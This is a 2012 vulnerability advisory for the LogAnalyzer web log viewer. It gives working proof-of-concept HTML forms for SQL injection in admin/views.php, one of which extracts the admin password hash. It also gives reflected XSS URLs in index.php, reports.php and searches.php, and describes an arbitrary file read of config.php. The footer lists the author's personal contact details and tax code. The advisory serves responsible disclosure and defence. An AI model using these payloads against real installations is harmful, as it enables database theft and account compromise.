Multiple vulnerabilities in LogAnalyzer

2012-06-03T00:00:00
ID SECURITYVULNS:DOC:28115
Type securityvulns
Reporter Securityvulns
Modified 2012-06-03T00:00:00

Description

Advisory ID: CSA-12005 Title: Multiple vulnerabilities in LogAnalyzer Product: LogAnalyzer Version: 3.4.2 and probably prior Vendor: adiscon.com Vulnerability type: SQL injection, XSS, Arbitrary File Read Risk level: 2 / 3 Credit: www.codseq.it CVE:
Vendor notification: 2012-05-21 Public disclosure: 2012-05-23

Details

LogAnalyzer version 3.4.2 and probably below suffers from multiple vulnerabilities:

  • SQL Injection

1) The script admin/views.php contains a SQL-Injection vulnerability when used to create a new view. It can be exploited by a non-admin user (with write access) to insert arbitrary data into logcon_views table. The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.

This PoC creates an arbitrary record into logcon_views table.

<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php"> <input name="DisplayName" value="dontcare"> <input name="isuseronly" value="2"> <input name="Columns[]" value="',2,null) ,('arbitrary','',1,2), ('dontcare2','"> <input name="op" value="addnewview"> <input type=submit value="go!"> </form>

2) The script admin/views.php contains a SQL-Injection vulnerability when used to update a view. It can be exploited by a non-admin user (with write access) to obtain arbitrary database data. The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.

This PoC updates a view and sets the admin password (md5) as the view name

<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php"> <input name="DisplayName" value="dontcare"> <input name="isuseronly" value="2"> <input name="Columns[]" value="',DisplayName=(select password from logcon_users where username='admin'),Columns='"> <input name="op" value="editview"> <input name="id" value="1"> <input type=submit value="go!"> </form>

  • Arbitrary File Read

LogAnalyzer allows non-admin users (with write access) to create a diskfile source with an arbitrary value as "syslog file" parameter. By setting this parameter to "config.php", the configuration file is disclosed when the source is loaded.

  • Cross Site Scripting

1) The input passed via the "filter" parameter to index.php is not properly sanitised before being returned to the user. http://127.0.0.1/loganalyzer-3.4.2/index.php?filter=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E

2) The input passed via the "id" parameter to admin/reports.php is not properly sanitised before being returned to the user. http://127.0.0.1/loganalyzer-3.4.2/admin/reports.php?op=details&id=eventsummary%3Cscript%3Ealert(1)%3C/script%3E

3) The input passed via the "id" parameter to admin/searches.php is not properly sanitised before being returned to the user. http://127.0.0.1/loganalyzer-3.4.2/admin/searches.php?op=edit&id=7%3Cscript%3Ealert(1)%3C/script%3E

Solution

upgrade to LogAnalyzer 3.4.3

Filippo Cavallarin

C o d S e q Development with an eye on security


Castello 2005, 30122 Venezia Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254 c.f. CVLFPP82B27L736J - p.iva 03737650279 http://www.codseq.it - filippo.cavallarin@codseq.it